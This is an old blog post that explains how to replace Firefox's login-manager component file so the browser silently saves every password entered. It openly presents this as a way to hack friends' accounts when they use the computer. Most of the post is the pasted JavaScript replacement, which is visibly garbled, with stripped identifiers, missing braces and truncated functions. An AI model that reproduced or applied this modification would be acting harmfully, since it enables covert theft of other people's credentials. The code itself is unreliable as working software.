Monday, October 24, 2011

Turn firefox into a stealer without softwares

Ever wanted to hack your friends accounts, whenever there were over your house or who evers! Or you

just wanted firefox to save all your passwords without prompting you every single time! This is for you,

read on!


1. Locate nsLoginManagerPrompter.js file (Default location C:\Program Files\Mozilla Firefox\components).
2. Open the file with word pad or notepad!
3. Press Ctrl + A on keyboard, and then press del or delete!
4. Copy and Paste all this:
5. Make sure Firefox is closed and save the file!
6. Your Done!


/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at

Mozilla Code Licensing

* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
* The Original Code is code.
* The Initial Developer of the Original Code is Mozilla Corporation.
* Portions created by the Initial Developer are Copyright (C) 2007
* the Initial Developer. All Rights Reserved.
* Contributor(s):
* Justin Dolske <> (original author)
* Ehsan Akhgari <>
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
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* the terms of any one of the MPL, the GPL or the LGPL.
* ***** END LICENSE BLOCK ***** */

const Cc = Components.classes;
const Ci = Components.interfaces;
const Cr = Components.results;


* LoginManagerPromptFactory
* Implements nsIPromptFactory
* Invoked by NS_NewAuthPrompter2()
* [embedding/components/windowwatcher/src/nsPrompt.cpp]
function LoginManagerPromptFactory() {}

LoginManagerPromptFactory.prototype = {

classDescription : "LoginManagerPromptFactory",
contractID : ";1",
classID : Components.ID("{749e62f4-60ae-4569-a8a2-de78b649660e}"),
QueryInterface : XPCOMUtils.generateQI([Ci.nsIPromptFactory]),

getPrompt : function (aWindow, aIID) {
var prompt = new LoginManagerPrompter().QueryInterface(aIID);
return prompt;
}; // end of LoginManagerPromptFactory implementation

/* ==================== LoginManagerPrompter ==================== */

* LoginManagerPrompter
* Implements interfaces for prompting the user to enter/save/change auth info.
* nsIAuthPrompt: Used by SeaMonkey, Thunderbird, but not Firefox.
* nsIAuthPrompt2: Is invoked by a channel for protocol-based authentication
* (eg HTTP Authenticate, FTP login).
* nsILoginManagerPrompter: Used by Login Manager for saving/changing logins
* found in HTML forms.
function LoginManagerPrompter() {}

LoginManagerPrompter.prototype = {

classDescription : "LoginManagerPrompter",
contractID : ";1",
classID : Components.ID("{8aa66d77-1bbb-45a6-991e-b8f47751c291}"),
QueryInterface : XPCOMUtils.generateQI([Ci.nsIAuthPrompt,

_window : null,
_debug : false, // mirrors signon.debug

__pwmgr : null, // Password Manager service
get _pwmgr() {
if (!this.__pwmgr)
this.__pwmgr = Cc[";1"].
return this.__pwmgr;

__logService : null, // Console logging service, used for debugging.
get _logService() {
if (!this.__logService)
this.__logService = Cc[";1"].
return this.__logService;

__promptService : null, // Prompt service for user interaction
get _promptService() {
if (!this.__promptService)
this.__promptService =
return this.__promptService;

__strBundle : null, // String bundle for L10N
get _strBundle() {
if (!this.__strBundle) {
var bunService = Cc[";1"].
this.__strBundle = bunService.createBundle(
if (!this.__strBundle)
throw "String bundle for Login Manager not present!";

return this.__strBundle;

__brandBundle : null, // String bundle for L10N
get _brandBundle() {
if (!this.__brandBundle) {
var bunService = Cc[";1"].
this.__brandBundle = bunService.createBundle(
if (!this.__brandBundle)
throw "Branding string bundle not present!";

return this.__brandBundle;

__ioService: null, // IO service for string -> nsIURI conversion
get _ioService() {
if (!this.__ioService)
this.__ioService = Cc[";1"].
return this.__ioService;

__ellipsis : null,
get _ellipsis() {
if (!this.__ellipsis) {
this.__ellipsis = "\u2026";
try {
var prefSvc = Cc[";1"].
this.__ellipsis = prefSvc.getComplexValue("intl.ellipsis",
} catch (e) { }
return this.__ellipsis;

// Whether we are in private browsing mode
get _inPrivateBrowsing() {
// The Private Browsing service might not be available.
try {
var pbs = Cc[";1"].
return pbs.privateBrowsingEnabled;
} catch (e) {
return false;

* log
* Internal function for logging debug messages to the Error Console window.
log : function (message) {
if (!this._debug)

dump("Pwmgr Prompter: " + message + "\n");
this._logService.logStringMessage("Pwmgr Prompter: " + message);

/* ---------- nsIAuthPrompt prompts ---------- */

* prompt
* Wrapper around the prompt service prompt. Saving random fields here
* doesn't really make sense and therefore isn't implemented.
prompt : function (aDialogTitle, aText, aPasswordRealm,
aSavePassword, aDefaultText, aResult) {
if (aSavePassword != Ci.nsIAuthPrompt.SAVE_PASSWORD_NEVER)
throw Components.results.NS_ERROR_NOT_IMPLEMENTED;

this.log("===== prompt() called =====");

if (aDefaultText) {
aResult.value = aDefaultText;

return this._promptService.prompt(this._window,
aDialogTitle, aText, aResult, null, {});

* promptUsernameAndPassword
* Looks up a username and password in the database. Will prompt the user
* with a dialog, even if a username and password are found.
promptUsernameAndPassword : function (aDialogTitle, aText, aPasswordRealm,
aSavePassword, aUsername, aPassword) {
this.log("===== promptUsernameAndPassword() called =====");

if (aSavePassword == Ci.nsIAuthPrompt.SAVE_PASSWORD_FOR_SESSION)
throw Components.results.NS_ERROR_NOT_IMPLEMENTED;

var selectedLogin = null;
var checkBox = { value : false };
var checkBoxLabel = null;
var [hostname, realm, unused] = this._getRealmInfo(aPasswordRealm);

// If hostname is null, we can't save this login.
if (hostname) {
var canRememberLogin;
if (this._inPrivateBrowsing)
canRememberLogin = false;
canRememberLogin = (aSavePassword ==

// if checkBoxLabel is null, the checkbox won't be shown at all.
if (canRememberLogin)
checkBoxLabel = this._getLocalizedString("rememberPassword");

// Look for existing logins.
var foundLogins = this._pwmgr.findLogins({}, hostname, null,

// XXX Like the original code, we can't deal with multiple
// account selection. (bug 227632)
if (foundLogins.length > 0) {
selectedLogin = foundLogins[0];

// If the caller provided a username, try to use it. If they
// provided only a password, this will try to find a password-only
// login (or return null if none exists).
if (aUsername.value)
selectedLogin = this._repickSelectedLogin(foundLogins,

if (selectedLogin) {
checkBox.value = true;
aUsername.value = selectedLogin.username;
// If the caller provided a password, prefer it.
if (!aPassword.value)
aPassword.value = selectedLogin.password;

var ok = this._promptService.promptUsernameAndPassword(this._window,
aDialogTitle, aText, aUsername, aPassword,
checkBoxLabel, checkBox);

if (!ok || !checkBox.value || !hostname)
return ok;

if (!aPassword.value) {
this.log("No password entered, so won't offer to save.");
return ok;

var newLogin = Cc[";1"].
newLogin.init(hostname, null, realm, aUsername.value, aPassword.value,
"", "");

// XXX We can't prompt with multiple logins yet (bug 227632), so
// the entered login might correspond to an existing login
// other than the one we originally selected.
selectedLogin = this._repickSelectedLogin(foundLogins, aUsername.value);

// If we didn't find an existing login, or if the username
// changed, save as a new login.
if (!selectedLogin) {
// add as new
this.log("New login seen for " + realm);
} else if (aPassword.value != selectedLogin.password) {
// update password
this.log("Updating password for " + realm);
this._pwmgr.modifyLogin(selectedLogin, newLogin);
} else {
this.log("Login unchanged, no further action needed.");

return ok;

* promptPassword
* If a password is found in the database for the password realm, it is
* returned straight away without displaying a dialog.
* If a password is not found in the database, the user will be prompted
* with a dialog with a text field and ok/cancel buttons. If the user
* allows it, then the password will be saved in the database.
promptPassword : function (aDialogTitle, aText, aPasswordRealm,
aSavePassword, aPassword) {
this.log("===== promptPassword called() =====");

if (aSavePassword == Ci.nsIAuthPrompt.SAVE_PASSWORD_FOR_SESSION)
throw Components.results.NS_ERROR_NOT_IMPLEMENTED;

var checkBox = { value : false };
var checkBoxLabel = null;
var [hostname, realm, username] = this._getRealmInfo(aPasswordRealm);

username = decodeURIComponent(username);

// If hostname is null, we can't save this login.
if (hostname && !this._inPrivateBrowsing) {
var canRememberLogin = (aSavePassword ==

// if checkBoxLabel is null, the checkbox won't be shown at all.
if (canRememberLogin)
checkBoxLabel = this._getLocalizedString("rememberPassword");

if (!aPassword.value) {
// Look for existing logins.
var foundLogins = this._pwmgr.findLogins({}, hostname, null,

// XXX Like the original code, we can't deal with multiple
// account selection (bug 227632). We can deal with finding the
// account based on the supplied username - but in this case we'll
// just return the first match.
for (var i = 0; i < foundLogins.length; ++i) {
if (foundLogins[i].username == username) {
aPassword.value = foundLogins[i].password;
// wallet returned straight away, so this mimics that code
return true;

var ok = this._promptService.promptPassword(this._window, aDialogTitle,
aText, aPassword,
checkBoxLabel, checkBox);

if (ok && checkBox.value && hostname && aPassword.value) {
var newLogin = Cc[";1"].
newLogin.init(hostname, null, realm, username,
aPassword.value, "", "");

this.log("New login seen for " + realm);


return ok;

/* ---------- nsIAuthPrompt helpers ---------- */

* Given aRealmString, such as "", returns an
* array of:
* - the formatted hostname
* - the realm (hostname + path)
* - the username, if present
* If aRealmString is in the format produced by NS_GetAuthKey for HTTP[S]
* channels, e.g. " (httprealm)", null is returned for all
* arguments to let callers know the login can't be saved because we don't
* know whether it's http or https.
_getRealmInfo : function (aRealmString) {
var httpRealm = /^.+ \(.+\)$/;
if (httpRealm.test(aRealmString))
return [null, null, null];

var uri = this._ioService.newURI(aRealmString, null, null);
var pathname = "";

if (uri.path != "/")
pathname = uri.path;

var formattedHostname = this._getFormattedHostname(uri);

return [formattedHostname, formattedHostname + pathname, uri.username];

/* ---------- nsIAuthPrompt2 prompts ---------- */

* promptAuth
* Implementation of nsIAuthPrompt2.
* nsIChannel aChannel
* int aLevel
* nsIAuthInformation aAuthInfo
promptAuth : function (aChannel, aLevel, aAuthInfo) {
var selectedLogin = null;
var checkbox = { value : false };
var checkboxLabel = null;
var epicfail = false;

try {

this.log("===== promptAuth called =====");

// If the user submits a login but it fails, we need to remove the
// notification bar that was displayed. Conveniently, the user will
// be prompted for authentication again, which brings us here.
var notifyBox = this._getNotifyBox();
if (notifyBox)

var [hostname, httpRealm] = this._getAuthTarget(aChannel, aAuthInfo);

// Looks for existing logins to prefill the prompt with.
var foundLogins = this._pwmgr.findLogins({},
hostname, null, httpRealm);
this.log("found " + foundLogins.length + " matching logins.");

// XXX Can't select from multiple accounts yet. (bug 227632)
if (foundLogins.length > 0) {
selectedLogin = foundLogins[0];
this._SetAuthInfo(aAuthInfo, selectedLogin.username,
checkbox.value = true;

var canRememberLogin = this._pwmgr.getLoginSavingEnabled(hostname);
if (this._inPrivateBrowsing)
canRememberLogin = false;

// if checkboxLabel is null, the checkbox won't be shown at all.
if (canRememberLogin && !notifyBox)
checkboxLabel = this._getLocalizedString("rememberPassword");
} catch (e) {
// Ignore any errors and display the prompt anyway.
epicfail = true;
Components.utils.reportError("LoginManagerPrompter: " +
"Epic fail in promptAuth: " + e + "\n");

var ok = this._promptService.promptAuth(this._window, aChannel,
aLevel, aAuthInfo, checkboxLabel, checkbox);

// If there's a notification box, use it to allow the user to
// determine if the login should be saved. If there isn't a
// notification box, only save the login if the user set the
// checkbox to do so.
var rememberLogin = notifyBox ? canRememberLogin : checkbox.value;
if (!ok || !rememberLogin || epicfail)
return ok;

try {
var [username, password] = this._GetAuthInfo(aAuthInfo);

if (!password) {
this.log("No password entered, so won't offer to save.");
return ok;

var newLogin = Cc[";1"].
newLogin.init(hostname, null, httpRealm,
username, password, "", "");

// XXX We can't prompt with multiple logins yet (bug 227632), so
// the entered login might correspond to an existing login
// other than the one we originally selected.
selectedLogin = this._repickSelectedLogin(foundLogins, username);

// If we didn't find an existing login, or if the username
// changed, save as a new login.
if (!selectedLogin) {
// add as new
this.log("New login seen for " + username +
" @ " + hostname + " (" + httpRealm + ")");
if (notifyBox)
this._showSaveLoginNotification(notifyBox, newLogin);

} else if (password != selectedLogin.password) {

this.log("Updating password for " + username +
" @ " + hostname + " (" + httpRealm + ")");
if (notifyBox)
selectedLogin, newLogin);
this._pwmgr.modifyLogin(selectedLogin, newLogin);

} else {
this.log("Login unchanged, no further action needed.");
} catch (e) {
Components.utils.reportError("LoginManagerPrompter: " +
"Fail2 in promptAuth: " + e + "\n");

return ok;

asyncPromptAuth : function () {

/* ---------- nsILoginManagerPrompter prompts ---------- */

* init
init : function (aWindow) {
this._window = aWindow;

var prefBranch = Cc[";1"].
this._debug = prefBranch.getBoolPref("debug");
this.log("===== initialized =====");

* promptToSavePassword
promptToSavePassword : function (aLogin) {
var notifyBox = this._getNotifyBox();

if (notifyBox)
this._showSaveLoginNotification(notifyBox, aLogin);

* _showLoginNotification
* Displays a notification bar.
_showLoginNotification : function (aNotifyBox, aName, aText, aButtons) {
var oldBar = aNotifyBox.getNotificationWithValue(aName);
const priority = aNotifyBox.PRIORITY_INFO_MEDIUM;

this.log("Adding new " + aName + " notification bar");
var newBar = aNotifyBox.appendNotification(
aText, aName,
priority, aButtons);

// The page we're going to hasn't loaded yet, so we want to persist
// across the first location change.

// Sites like Gmail perform a funky redirect dance before you end up
// at the post-authentication page. I don't see a good way to
// heuristically determine when to ignore such location changes, so
// we'll try ignoring location changes based on a time interval.
newBar.timeout = + 20000; // 20 seconds

if (oldBar) {
this.log("(...and removing old " + aName + " notification bar)");

* _showSaveLoginNotification
* Displays a notification bar (rather than a popup), to allow the user to
* save the specified login. This allows the user to see the results of
* their login, and only save a login which they know worked.
_showSaveLoginNotification : function (aNotifyBox, aLogin) {

var pwmgr = this._pwmgr;

* _removeLoginNotifications
_removeLoginNotifications : function (aNotifyBox) {
var oldBar = aNotifyBox.getNotificationWithValue("password-save");
if (oldBar) {
this.log("Removing save-password notification bar.");

oldBar = aNotifyBox.getNotificationWithValue("password-change");
if (oldBar) {
this.log("Removing change-password notification bar.");

* _showSaveLoginDialog
* Called when we detect a new login in a form submission,
* asks the user what to do.
_showSaveLoginDialog : function (aLogin) {
const buttonFlags = Ci.nsIPrompt.BUTTON_POS_1_DEFAULT +

var brandShortName =
var displayHost = this._getShortDisplayHost(aLogin.hostname);

var dialogText;
if (aLogin.username) {
var displayUser = this._sanitizeUsername(aLogin.username);
dialogText = this._getLocalizedString(
[brandShortName, displayUser, displayHost]);
} else {
dialogText = this._getLocalizedString(
[brandShortName, displayHost]);
var dialogTitle = this._getLocalizedString(
var neverButtonText = this._getLocalizedString(
var rememberButtonText = this._getLocalizedString(
var notNowButtonText = this._getLocalizedString(

this.log("Prompting user to save/ignore login");
var userChoice = this._promptService.confirmEx(this._window,
dialogTitle, dialogText,
buttonFlags, rememberButtonText,
notNowButtonText, neverButtonText,
null, {});
// Returns:
// 0 - Save the login
// 1 - Ignore the login this time
// 2 - Never save logins for this site
if (userChoice == 2) {
this.log("Disabling " + aLogin.hostname + " logins by request.");
this._pwmgr.setLoginSavingEnabled(aLogin.hostname, false);
} else if (userChoice == 0) {
this.log("Saving login for " + aLogin.hostname);
} else {
// userChoice == 1 --> just ignore the login.
this.log("Ignoring login.");

* promptToChangePassword
* Called when we think we detect a password change for an existing
* login, when the form being submitted contains multiple password
* fields.
promptToChangePassword : function (aOldLogin, aNewLogin) {
var notifyBox = this._getNotifyBox();

if (notifyBox)
this._showChangeLoginNotification(notifyBox, aOldLogin, aNewLogin);
this._showChangeLoginDialog(aOldLogin, aNewLogin);

* _showChangeLoginNotification
* Shows the Change Password notification bar.
_showChangeLoginNotification : function (aNotifyBox, aOldLogin, aNewLogin) {
var notificationText;
if (aOldLogin.username)
notificationText = this._getLocalizedString(
notificationText = this._getLocalizedString(

var changeButtonText =
var changeButtonAccessKey =
var dontChangeButtonText =
var dontChangeButtonAccessKey =

// The callbacks in |buttons| have a closure to access the variables
// in scope here; set one to |this._pwmgr| so we can get back to pwmgr
// without a getService() call.
var pwmgr = this._pwmgr;

var buttons = [
// "Yes" button
label: changeButtonText,
accessKey: changeButtonAccessKey,
popup: null,
callback: function(aNotificationBar, aButton) {
pwmgr.modifyLogin(aOldLogin, aNewLogin);

// "No" button
label: dontChangeButtonText,
accessKey: dontChangeButtonAccessKey,
popup: null,
callback: function(aNotificationBar, aButton) {
// do nothing

this._showLoginNotification(aNotifyBox, "password-change",
notificationText, buttons);

* _showChangeLoginDialog
* Shows the Change Password dialog.
_showChangeLoginDialog : function (aOldLogin, aNewLogin) {
const buttonFlags = Ci.nsIPrompt.STD_YES_NO_BUTTONS;

var dialogText;
if (aOldLogin.username)
dialogText = this._getLocalizedString(
dialogText = this._getLocalizedString(

var dialogTitle = this._getLocalizedString(

// returns 0 for yes, 1 for no.
var ok = !this._promptService.confirmEx(this._window,
dialogTitle, dialogText, buttonFlags,
null, null, null,
null, {});
if (ok) {
this.log("Updating password for user " + aOldLogin.username);
this._pwmgr.modifyLogin(aOldLogin, aNewLogin);

* promptToChangePasswordWithUsernames
* Called when we detect a password change in a form submission, but we
* don't know which existing login (username) it's for. Asks the user
* to select a username and confirm the password change.
* Note: The caller doesn't know the username for aNewLogin, so this
* function fills in .username and .usernameField with the values
* from the login selected by the user.
* Note; XPCOM ******ity: |count| is just |logins.length|.
promptToChangePasswordWithUsernames : function (logins, count, aNewLogin) {
const buttonFlags = Ci.nsIPrompt.STD_YES_NO_BUTTONS;

var usernames = (l) l.username);
var dialogText = this._getLocalizedString("userSelectText");
var dialogTitle = this._getLocalizedString("passwordChangeTitle");
var selectedIndex = { value: null };

// If user selects ok, outparam.value is set to the index
// of the selected username.
var ok =,
dialogTitle, dialogText,
usernames.length, usernames,
if (ok) {
// Now that we know which login to change the password for,
// update the missing username info in the aNewLogin.

var selectedLogin = logins[selectedIndex.value];

this.log("Updating password for user " + selectedLogin.username);

aNewLogin.username = selectedLogin.username;
aNewLogin.usernameField = selectedLogin.usernameField;

this._pwmgr.modifyLogin(selectedLogin, aNewLogin);

/* ---------- Internal Methods ---------- */

* _getNotifyBox
* Returns the notification box to this prompter, or null if there isn't
* a notification box available.
_getNotifyBox : function () {
var notifyBox = null;

// Given a content DOM window, returns the chrome window it's in.
function getChromeWindow(aWindow) {
var chromeWin = aWindow
return chromeWin;

try {
// Get topmost window, in case we're in a frame.
var notifyWindow =

// Some sites pop up a temporary login window, when disappears
// upon submission of credentials. We want to put the notification
// bar in the opener window if this seems to be happening.
if (notifyWindow.opener) {
var chromeDoc = getChromeWindow(notifyWindow)
var webnav = notifyWindow

// Check to see if the current window was opened with chrome
// disabled, and if so use the opener window. But if the window
// has been used to visit other pages (ie, has a history),
// assume it'll stick around and *don't* use the opener.
if (chromeDoc.getAttribute("chromehidden") &&
webnav.sessionHistory.count == 1) {
this.log("Using opener window for notification bar.");
notifyWindow = notifyWindow.opener;

// Get the chrome window for the content window we're using.
// .wrappedJSObject needed here -- see bug 422974 comment 5.
var chromeWin = getChromeWindow(notifyWindow).wrappedJSObject;

if (chromeWin.getNotificationBox)
notifyBox = chromeWin.getNotificationBox(notifyWindow);
this.log("getNotificationBox() not available on window");

} catch (e) {
// If any errors happen, just assume no notification box.
this.log("No notification box available: " + e)

return notifyBox;

* _repickSelectedLogin
* The user might enter a login that isn't the one we prefilled, but
* is the same as some other existing login. So, pick a login with a
* matching username, or return null.
_repickSelectedLogin : function (foundLogins, username) {
for (var i = 0; i < foundLogins.length; i++)
if (foundLogins[i].username == username)
return foundLogins[i];
return null;

* _getLocalizedString
* Can be called as:
* _getLocalizedString("key1");
* _getLocalizedString("key2", ["arg1"]);
* _getLocalizedString("key3", ["arg1", "arg2"]);
* (etc)
* Returns the localized string for the specified key,
* formatted if required.
_getLocalizedString : function (key, formatArgs) {
if (formatArgs)
return this._strBundle.formatStringFromName(
key, formatArgs, formatArgs.length);
return this._strBundle.GetStringFromName(key);

* _sanitizeUsername
* Sanitizes the specified username, by stripping quotes and truncating if
* it's too long. This helps prevent an evil site from messing with the
* "save password?" prompt too much.
_sanitizeUsername : function (username) {
if (username.length > 30) {
username = username.substring(0, 30);
username += this._ellipsis;
return username.replace(/['"]/g, "");

* _getFormattedHostname
* The aURI parameter may either be a string uri, or an nsIURI instance.
* Returns the hostname to use in a nsILoginInfo object (for example,
* "").
_getFormattedHostname : function (aURI) {
var uri;
if (aURI instanceof Ci.nsIURI) {
uri = aURI;
} else {
uri = this._ioService.newURI(aURI, null, null);
var scheme = uri.scheme;

var hostname = scheme + "://" +;

// If the URI explicitly specified a port, only include it when
// it's not the default. (We never want "")
port = uri.port;
if (port != -1) {
var handler = this._ioService.getProtocolHandler(scheme);
if (port != handler.defaultPort)
hostname += ":" + port;

return hostname;

* _getShortDisplayHost
* Converts a login's hostname field (a URL) to a short string for
* prompting purposes. Eg, "" --> "", or
* "" --> "".
_getShortDisplayHost: function (aURIString) {
var displayHost;

var eTLDService = Cc[";1"].
var idnService = Cc[";1"].
try {
var uri = this._ioService.newURI(aURIString, null, null);
var baseDomain = eTLDService.getBaseDomain(uri);
displayHost = idnService.convertToDisplayIDN(baseDomain, {});
} catch (e) {
this.log("_getShortDisplayHost couldn't process " + aURIString);

if (!displayHost)
displayHost = aURIString;

return displayHost;

* _getAuthTarget
* Returns the hostname and realm for which authentication is being
* requested, in the format expected to be used with nsILoginInfo.
_getAuthTarget : function (aChannel, aAuthInfo) {
var hostname, realm;

// If our proxy is demanding authentication, don't use the
// channel's actual destination.
if (aAuthInfo.flags & Ci.nsIAuthInformation.AUTH_PROXY) {
this.log("getAuthTarget is for proxy auth");
if (!(aChannel instanceof Ci.nsIProxiedChannel))
throw "proxy auth needs nsIProxiedChannel";

var info = aChannel.proxyInfo;
if (!info)
throw "proxy auth needs nsIProxyInfo";

// Proxies don't have a scheme, but we'll use "moz-proxy://"
// so that it's more obvious what the login is for.
var idnService = Cc[";1"].
hostname = "moz-proxy://" +
idnService.convertUTF8toACE( +
":" + info.port;
realm = aAuthInfo.realm;
if (!realm)
realm = hostname;

return [hostname, realm];

hostname = this._getFormattedHostname(aChannel.URI);

// If a HTTP WWW-Authenticate header specified a realm, that value
// will be available here. If it wasn't set or wasn't HTTP, we'll use
// the formatted hostname instead.
realm = aAuthInfo.realm;
if (!realm)
realm = hostname;

return [hostname, realm];

* Returns [username, password] as extracted from aAuthInfo (which
* holds this info after having prompted the user).
* If the authentication was for a Windows domain, we'll prepend the
* return username with the domain. (eg, "domain\user")
_GetAuthInfo : function (aAuthInfo) {
var username, password;

var flags = aAuthInfo.flags;
if (flags & Ci.nsIAuthInformation.NEED_DOMAIN && aAuthInfo.domain)
username = aAuthInfo.domain + "\\" + aAuthInfo.username;
username = aAuthInfo.username;

password = aAuthInfo.password;

return [username, password];

* Given a username (possibly in DOMAIN\user form) and password, parses the
* domain out of the username if necessary and sets domain, username and
* password on the auth information object.
_SetAuthInfo : function (aAuthInfo, username, password) {
var flags = aAuthInfo.flags;
if (flags & Ci.nsIAuthInformation.NEED_DOMAIN) {
// Domain is separated from username by a backslash
var idx = username.indexOf("\\");
if (idx == -1) {
aAuthInfo.username = username;
} else {
aAuthInfo.domain = username.substring(0, idx);
aAuthInfo.username = username.substring(idx+1);
} else {
aAuthInfo.username = username;
aAuthInfo.password = password;

}; // end of LoginManagerPrompter implementation

var component = [LoginManagerPromptFactory, LoginManagerPrompter];
function NSGetModule(compMgr, fileSpec) {
return XPCOMUtils.generateModule(component);

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